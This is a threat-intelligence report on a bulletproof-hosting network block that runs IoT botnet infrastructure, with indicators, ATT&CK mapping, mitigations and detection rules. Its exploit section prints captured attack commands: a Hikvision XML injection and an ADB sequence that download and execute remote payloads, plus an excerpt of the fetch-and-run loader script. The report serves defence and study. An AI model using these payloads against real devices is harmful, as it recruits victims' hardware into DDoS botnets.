TLP:CLEAR

StormCloud Bulletproof Hosting — infrastructure profile

A newly-registered bulletproof ASN running one /24 as self-contained multi-tenant IoT botnet infrastructure — scan, exploit, host, and C2 all in the same block

Published 2026-08-01 Source Distributed SSH/Telnet Honeypot Fleet Confidence MEDIUM-HIGH Classification Bulletproof Hosting Infrastructure / Mirai-Gafgyt Lineage

Last updated 2026-08-01.

Executive summary

A single /24 has been running as self-contained, multi-tenant IoT botnet infrastructure against our entire fleet for over a month: the same handful of IP addresses scan for vulnerable devices, deliver the exploit, host the payload, and receive the C2 beacon, all within one block. It sits behind a bulletproof-hosting ASN that was registered just nine days before we saw it turn hostile.

Key Finding
94.154.43.0/24 is announced by AS219502 ("STORMCLOUD-AS"), a RIPE ASN registered 2026-06-09. Our fleet's first capture of a payload served from this block is 2026-06-28; a C2 endpoint inside the same /24 (94.154.43.46) was already live nine days earlier, on 2026-06-18, per our own MICROC2 report. Between then and today the block has hit all 44 sensors in our fleet, generating 58,365 exploit-command events from 45 distinct source IPs across six exploitation vectors, and served 406 malware samples from 22 rotating hosting IPs. The registrant behind the /24 traces to a Kharkiv, Ukraine-based operator; the ASN's sole upstream transit is Amarutu Technology Ltd, a Seychelles-registered network placed on the USTR's Notorious Markets list in 2022 for ignoring abuse takedowns.

This is not one campaign. It's shared criminal hosting. We observed at least four distinct build/naming conventions cycling through the same single IP (94.154.43.123) at different points in July: a randomized-token payload-directory loader (twice, 12 days apart, near-identical builder output both times), raw architecture-named binaries dropped at web root, a "boatnet.*"-branded release, and operator self-testing artifacts (testbot.sh). VirusTotal classifies the samples we submitted as Mirai/Gafgyt-lineage trojans and, for one build, explicitly as a DDoS agent — consistent with the operator's public marketing and with prior public research (Hunt.io, April 2026) tying the same corporate entity's infrastructure to the xlabs_v1 DDoS-for-hire IoT botnet on a sibling ASN.

44/44
Sensors Hit
58,365
Exploit Events
6
Exploitation Vectors
22
Rotating Hosting IPs
406
Samples Captured
34+
Days Active, Ongoing
14–33/62
VT Detections (range)

Threat actor profile

The corporate entity behind this ASN, Storm Industries LLC (trading as "StormCloud"), is not a new discovery on its own: its infrastructure has prior public attribution. What's new here is identifying this specific block (94.154.43.0/24 / AS219502) as the operator's current active infrastructure, and confirming it directly against our own fleet telemetry.

Prior public research on this operator
In April 2026, Hunt.io published research on xlabs_v1, a Mirai-derived DDoS-for-hire IoT botnet exploiting exposed Android Debug Bridge (ADB) services, run by an operator using the handle "Tadashi." That investigation traced the botnet's C2, distribution, staging, and even co-located Monero cryptojacking infrastructure to a single bulletproof /24 (176.65.139.0/24) announced by AS214472 ("Offshore LC"), a Netherlands-registered network under the same Storm Industries LLC corporate umbrella. Our own corpus independently confirms this: we captured 584 samples from 176.65.139.0/24 between 2026-04-27 and 2026-06-19 — the same window Hunt.io's report covers. Our fleet also captured the exact ADB masquerade pattern xlabs_v1 is known for (a bot binary disguised as com.supercell.clashroyal, fetched via adb:shell) from the new 94.154.43.0/24 block — see Exploit payloads. We treat this as strong circumstantial evidence of continuity between the two blocks, not confirmed attribution to the same botnet build.
AttributeAssessmentConfidence
Motivation DDoS-for-hire / general-purpose IoT botnet recruitment. VT classifies one submitted sample as a DDoS agent and another as Mirai/Gafgyt; no crypto-mining or credential-theft behavior observed in our own captures HIGH
Sophistication Low-to-intermediate on the loader itself — a bare wget/curl/tftp multi-arch fetch chain with no sandbox-evasion logic, no persistence mechanism, no anti-forensics (contrast with MICROC2's loader, which has all three). The sophistication here is operational: automated builder tooling producing near-identical loaders on demand, and bulletproof hosting infrastructure that tolerates constant abuse. HIGH
Attribution Corporate entity identified (Storm Industries LLC / StormCloud); specific bot operator(s) using this hosting are not identified; the block hosts multiple concurrent, differently-branded builds, consistent with shared bulletproof hosting used by more than one customer MED
Target profile Broadly opportunistic — six distinct exploitation vectors observed hitting Hadoop clusters, Android/ADB devices, IP cameras (Hikvision), consumer routers (Realtek, Huawei), and generic Telnet/SSH-exposed Linux hosts, across every architecture our sandbox supports (ARM, MIPS, x86/x86_64, SH4, PowerPC, and more) HIGH
Operational tempo Continuous — 22 hosting IPs have rotated through this one /24 over 34+ days with no gap longer than a few days, and the block was still actively serving payloads and receiving exploit traffic at the time of writing HIGH

Infrastructure analysis

The hosting provider

AttributeValue
Announced prefix94.154.43.0/24 (single prefix originated by this ASN, RPKI-valid)
ASNAS219502, name STORMCLOUD-AS
ASN registered2026-06-09 (RIPE aut-num object creation date)
Corporate registrantStorm Industries LLC — registered address 1209 Mountain Road Pl NE, Albuquerque, NM, a shared registered-agent office (Northwest Registered Agent Inc.), not an operating address
IP block registrant"FOP Danik Vyacheslav Evgenievich," Kharkiv, Ukraine (per RDAP) — matches the "Kharkiv, Ukraine-based reseller" WHOIS attribution our own MICROC2 report independently made for 94.154.43.46 on 2026-07-03
Administrative/technical contact"StormCloud Network Operations," Aberdare, United Kingdom; abuse contact abuse@stormindustries.llc
Sole upstream transitAS206264, Amarutu Technology Ltd (Seychelles) — publicly documented bulletproof-hosting provider, also known as KoDDos, placed on the USTR's "Notorious Markets" list in 2022 for hosting large piracy operations and ignoring DMCA/abuse takedowns
Public marketingThe operator's own site (stormcloud.pw) advertises "zero data collection," no KYC/identity verification, and cryptocurrency-only payment: self-described bulletproof hosting
Routing hygienePublicly-observed BGP monitoring notes this ASN announcing bogon space — a common signal of loose or deliberately permissive network operations

One data point we could not reconcile: a live spur.us lookup on the currently-active hosting IP (94.154.43.123) attributes it to a different ASN, 48678 ("Pentech Bilisim Teknolojileri," Turkey), while RIPE RDAP and BGP routing tables both show AS219502. This could reflect a recent transit/reseller change, a multihomed announcement, or simply a stale record in one of the two sources — we're flagging the discrepancy rather than resolving it. spur.us does independently flag the IP's traffic with an OPEN_PROXY_USER client-behavior tag, consistent with abuse-heavy usage regardless of which ASN record is current.

Self-contained infrastructure: scanner, host, and C2 in one block

Correlating our sample-capture records against the honeypot session that triggered each capture shows the same IP inside 94.154.43.0/24 acting as both the exploiting/scanning source and the payload host in the large majority of cases (e.g. 94.154.43.10 both scanned and served from 94.154.43.10; 94.154.43.123 both scanned and served from 94.154.43.123). Live sandbox detonation of samples pulled from this block confirms the pattern extends to command-and-control: of 37 distinct C2 endpoints observed across detonations, the large majority beacon back into the same 94.154.43.0/24 block on non-standard high ports (18129, 6621, 8060, 9111, 60195, 1337, and others) rather than to separate, dedicated C2 infrastructure. A minority of builds beacon externally (195.96.135.248:8529, seen 6 times; 65.222.202.53:80, seen 3 times) — see Malware analysis.

Rotating hosting IPs (34-day window)

IPSamples servedFirst seenLast seen
94.154.43.123602026-07-192026-07-31
94.154.43.95402026-07-062026-07-27
94.154.43.88312026-07-282026-07-28
94.154.43.192302026-07-052026-07-12
94.154.43.91292026-07-222026-07-23
94.154.43.46232026-07-162026-07-30
94.154.43.51222026-07-142026-07-14
94.154.43.10212026-07-122026-07-26
94.154.43.68202026-07-052026-07-26
94.154.43.77162026-07-052026-07-06
94.154.43.37152026-07-102026-07-10
94.154.43.61152026-07-102026-07-10
94.154.43.70142026-07-092026-07-09
94.154.43.5142026-06-292026-06-29
94.154.43.96132026-07-222026-07-27
94.154.43.87122026-06-282026-07-19
94.154.43.115122026-07-222026-07-22
94.154.43.16492026-07-212026-07-30
94.154.43.19172026-07-232026-07-23
94.154.43.11612026-07-122026-07-12
94.154.43.9212026-07-222026-07-22
94.154.43.14812026-07-292026-07-29

Activity is confined to this /24 specifically; no payload activity was found in the neighboring 94.154.40.0/22, 94.154.44.0/23, or 94.154.46.0/24 ranges that also fall under the same parent RIPE allocation.

Malware analysis

We submitted four representative samples, spanning both loader scripts and compiled binaries, to VirusTotal for fresh analysis:

SHA256 (short)TypeDetectionsVT Threat Label
217da271…c14a5 POSIX shell loader (2026-07-19 build) 27 / 62 trojan.shell/abdownloader (Lionic tags it Trojan.Linux.Gafgyt.m!c)
2fa5afc0…1d6e0 POSIX shell loader (2026-07-31 build) 14 / 62 downloader.bash/crit
30883509…d694 ELF 32-bit ARM ("boatnet.arm") 33 / 63 trojan.mirai/gafgyt
9b6260c8…8a28 ELF 32-bit ARM, 10.1 MB (unusually large — likely Go-based) 24 / 63 trojan.ddos/ddosagent

The two loader scripts, captured 12 days apart under different random path tokens, are near-byte-identical templates — same architecture-detection case statement, same wget/curl/tftp fallback chain, same obfuscated cache-busting query token built from a chain of randomly-named shell variables, and the same spoofed User-Agent on every fetch:

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Valve Steam Gamepad/1708467439 (SteamOS)

This is generated output from a builder tool, not hand-written per session, a strong fingerprint for correlating future captures back to this operator even after the hosting IP rotates again.

File type diversity

The 406 captured samples span 20 distinct architecture/format combinations — ARM (32- and 64-bit), Intel x86/x86-64, MIPS (LE and BE), PowerPC, SPARC, Renesas SH, ARC, RISC-V, and more — the standard Mirai-derivative "compile for everything, let the loader pick" approach.

Sandbox detonation

394 detonation attempts were run against samples from this block across 8 architectures our sandbox supports:

ArchitectureAttemptsBootedExecuted
ARM117117112
i386565652
MIPS353533
MIPS (LE)323230
SH4292929
x86_64232321
ARM64776

Where our sandbox could identify and boot the target architecture, execution succeeded roughly 95% of the time: these are functioning, not broken, builds. (95 additional attempts against unrecognized/unsupported architecture formats are excluded from the table; they never booted.)

Observed TTPs — MITRE ATT&CK

TechniqueIDEvidence
Exploit Public-Facing Application T1190 Unauthenticated Hadoop YARN ResourceManager RCE (45,095 events, dominant vector), Hikvision IP-camera Apache RCE via XML command injection, Realtek/Huawei SOAP UPnP RCE
Exploitation of Remote Services T1210 Exposed Android Debug Bridge (ADB) abuse, 12,032 events — matches the ADB-targeting M.O. documented for this operator's prior xlabs_v1 infrastructure
Ingress Tool Transfer T1105 wget/curl/tftp fallback chain fetching architecture-matched payload from the same or a sibling IP in the /24
Command and Scripting Interpreter: Unix Shell T1059.004 POSIX /bin/sh loader scripts driving the entire fetch-and-execute chain
Masquerading T1036 ADB-delivered payload written to disk and executed as com.supercell.clashroyal, disguised as a legitimate Android game package
Indicator Removal T1070 Loader deletes the fetched binary from disk immediately after confirming it launched successfully
Network Denial of Service T1498 VirusTotal classifies one submitted build as a DDoS agent; consistent with the operator's public marketing and Hunt.io's prior characterization of the same corporate entity's infrastructure as DDoS-for-hire. Not directly observed as an executed attack in our own detonations for this specific sample set (contrast MICROC2, where a live flood was captured) — included on classification and lineage evidence, not direct behavioral confirmation.

Activity timeline

2026-04-27 → 2026-06-19
Our fleet independently captures 584 samples from 176.65.139.0/24 (AS214472, "Offshore LC") — the same window Hunt.io's xlabs_v1 report covers, and the same corporate operator (Storm Industries LLC) as the block this report covers.
2026-06-09
AS219502 ("STORMCLOUD-AS") registered in the RIPE database.
2026-06-18
Per our MICROC2 report, 94.154.43.46 — inside the block this report covers — is already live as an active C2, nine days after the ASN's registration.
2026-06-28
First payload directly served from this /24 lands in our sample corpus (94.154.43.87), alongside the first Hikvision-vector exploit commands referencing the block, hitting 4 sensors within 10 minutes.
2026-06-29
First ADB-vector exploitation referencing this block, delivering a payload masquerading as com.supercell.clashroyal across 4 sensors.
2026-07-05 → 2026-07-31
22 distinct hosting IPs rotate through the block in overlapping, non-contiguous windows — see the full table in Infrastructure analysis.
2026-07-19 and 2026-07-31
The same hosting IP (94.154.43.123) serves two separate loader waves, 12 days apart, using near-identical builder-generated scripts under different random path tokens.
2026-08-01 (report writing)
Block remains active; exploit-command traffic referencing this /24 was captured within the hour of this report's data pull.

Exploit payloads

Hikvision IP camera — Apache RCE via XML command injection

<?xml version="1.0" encoding="UTF-8"?><language>$(cd /tmp;/bin/busybox wget -q http://94.154.43.87/wget.sh -O .ww;sh .ww multi.hikvision)</language>

Identical across all four sensors it hit within a 9-minute window on 2026-06-28, with a fixed multi.hikvision argument identifying the exploited device class to the fetched script.

Exposed Android Debug Bridge (ADB) — masquerading payload

toybox wget http://94.154.43.48/rebirth.arm7 -O /data/local/tmp/com.supercell.clashroyal
chmod 777 /data/local/tmp/com.supercell.clashroyal
./data/local/tmp/com.supercell.clashroyal adb

The same three-line sequence (tried with both toybox and busybox as fallbacks) was captured identically across every ADB-vector hit, disguising the payload as a popular mobile game's package name.

Unauthenticated Hadoop YARN ResourceManager RCE — dominant vector by volume

This is the same misconfiguration class covered in depth in our MICROC2 report, and the single largest vector observed here by event count (45,095 of 58,365 total). We did not re-derive per-event detail for this report; see MICROC2 for the full exploitation mechanics.

Loader script — architecture detection and fetch chain

#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
N=$(head -c 32 /dev/urandom 2>/dev/null | tr -dc 'a-z' | head -c 6)
ARCH=$(uname -m 2>/dev/null)
case "$ARCH" in
    x86_64|amd64)  ARCH="x86_64" ;;
    aarch64|arm64) ARCH="aarch64" ;;
    armv7*|armv7l) ARCH="armv7l" ;;
    # ... full case covers armv4-7, mips/mipsel/mips64, ppc, sh4, i486-i686, m68k, s390x, riscv64
esac

fetch() {
    # tries wget, then curl, then tftp, in that order
    wget -q -U "$UA" -O "$O" "$U?t=$T" 2>/dev/null && return 0
    curl -s -A "$UA" -o "$O" "$U?t=$T" 2>/dev/null && return 0
    tftp -g -r "$F" "$H" 2>/dev/null && mv "$F" "$O" 2>/dev/null && return 0
}

try_run() {
    fetch "$URL" "$N" || return 1
    chmod +x "$N" 2>/dev/null
    ./"$N" /dev/null 2>&1 &
    sleep 1
    kill -0 $PID 2>/dev/null && { rm -f "$N" 2>/dev/null; exit 0; }  # success: cover tracks
    rm -f "$N" 2>/dev/null; return 1
}

# PRIMARY selected by uname -m match; on failure, walks the full FALLBACK
# list of every other architecture's binary until one launches successfully.

No sandbox/VM detection, no persistence installation, no log tampering — this loader's only "evasion" is deleting the dropped binary once it confirms the process is still alive one second after launch. Compare this to MICROC2's loader, which included all of the above; this is a simpler, more disposable tool, consistent with high-volume, low-effort deployment rather than a single high-value operation.

Indicators of compromise

Network infrastructure

Malicious /24
94.154.43.0/24
AS219502 ("STORMCLOUD-AS") — recommend perimeter blocking of the full /24, not just individual IPs, given the rotation observed
Upstream transit
AS206264 (Amarutu Technology Ltd)
Sole peer; independently documented bulletproof-hosting/transit provider
C2 port pattern
Non-standard high ports: 18129, 6621, 8060, 9111, 60195, 1337, and others
Observed in live sandbox detonation, mostly beaconing back into the same /24
Loader URL pattern
http://94.154.43.<x>:8080/payload/<random-token>/<random-token>.sh
Builder-generated random path tokens per session
Payload naming variants
boatnet.<arch> · rebirth.arm7 · testbot.sh
Multiple distinct naming conventions on the same hosting IP — evidence of multi-tenant usage
Beacon User-Agent
"...Valve Steam Gamepad/1708467439 (SteamOS)"
Fixed string on every wget/curl fetch from the loader script

Hosting IPs (22, see full table with dates in Infrastructure analysis)

94.154.43.5, 94.154.43.10, 94.154.43.37, 94.154.43.46, 94.154.43.51, 94.154.43.61, 94.154.43.68, 94.154.43.70, 94.154.43.77, 94.154.43.87, 94.154.43.88, 94.154.43.91, 94.154.43.92, 94.154.43.95, 94.154.43.96, 94.154.43.115, 94.154.43.116, 94.154.43.123, 94.154.43.148, 94.154.43.164, 94.154.43.191, 94.154.43.192

File IOCs

SHA256TypeVT
217da2717f538903ab31fd688baef1d0d609d8ffd7d589066707cd91ba3a3525 POSIX shell loader 27/62
2fa5afc0bb425eeb9f9c4a653e6721c7545b798074049129e7ecdee7fd61d6e0 POSIX shell loader 14/62
3088350951e0216a5e0397d30687153ce3a96fe137bf5e9e603428dde2ddd694 ELF ARM (boatnet.arm) 33/63
9b6260c893ac891a35655463a7dcbf150a89af51b1eeebfa0514d61689ca8a28 ELF ARM, 10.1MB 24/63

402 further samples were captured from this block; SHA256 list available on request via the fleet's investigation tooling.

Mitigations and detection

ActionPriorityDetail
Block the full /24 at the perimeter HIGH Individual-IP blocking is ineffective given the observed rotation (22 IPs across 34 days); block 94.154.43.0/24 outbound and inbound
Disable/authenticate ADB on Internet-facing devices HIGH Android TV boxes, set-top boxes, and dev devices with ADB reachable over the network are a primary vector here and for this operator's prior xlabs_v1 activity
Disable unauthenticated Hadoop YARN REST API HIGH See MICROC2 report for full detail — this is the single largest vector by volume in this dataset too
Patch/isolate IP cameras and consumer routers MED Hikvision, Realtek eCos-based, and Huawei HG532 devices should not be directly Internet-exposed
Hunt for the fixed beacon User-Agent MED Outbound HTTP requests carrying the "Valve Steam Gamepad/1708467439 (SteamOS)" UA string from non-gaming infrastructure is a strong signal

Detection signatures

# Suricata/Snort — loader fetch from the StormCloud block
alert http any any -> any any (msg:"StormCloud bulletproof-net loader fetch"; \
  content:"94.154.43."; http_header; \
  content:"payload/"; http_uri; \
  flow:established,to_server; sid:9920101; rev:1;)

# Suricata — fixed beacon User-Agent
alert http $HOME_NET any -> any any (msg:"StormCloud loader beacon UA"; \
  content:"Valve Steam Gamepad/1708467439 (SteamOS)"; http_user_agent; \
  flow:established,to_server; sid:9920102; rev:1;)

# Suricata — Hikvision XML command injection referencing this block
alert http any any -> $HOME_NET any (msg:"Hikvision XML RCE - StormCloud payload"; \
  content:"$("; http_client_body; \
  content:"94.154.43."; http_client_body; \
  flow:established,to_server; sid:9920103; rev:1;)

# Suricata — ADB masquerade payload
alert tcp any any -> $HOME_NET 5555 (msg:"ADB StormCloud payload - fake package name"; \
  content:"com.supercell.clashroyal"; \
  flow:established,to_server; sid:9920104; rev:1;)

# Suricata — outbound to the full /24
alert ip $HOME_NET any -> 94.154.43.0/24 any (msg:"Outbound to StormCloud bulletproof net"; \
  sid:9920105; rev:1;)

Collection methodology

All data in this report was collected organically by a distributed SSH/Telnet honeypot fleet deployed across multiple cloud providers and geographic regions. Fleet nodes also run alternate-protocol lure daemons that capture exploitation attempts against commonly-targeted services beyond SSH/Telnet, including the Hadoop YARN, ADB, SOAP/UPnP, and Apache/IP-camera vectors covered in this report.

Payloads were fetched by the fleet's automated pipeline at first capture. Representative samples were detonated in an isolated sandbox environment with network egress routed through a residential-style VPN for realistic network conditions; no interaction with victim networks occurred beyond passive observation of traffic the samples themselves generated. VirusTotal file, ASN, and routing lookups were performed via the fleet's own investigation tooling and live RDAP/BGP queries as part of this investigation.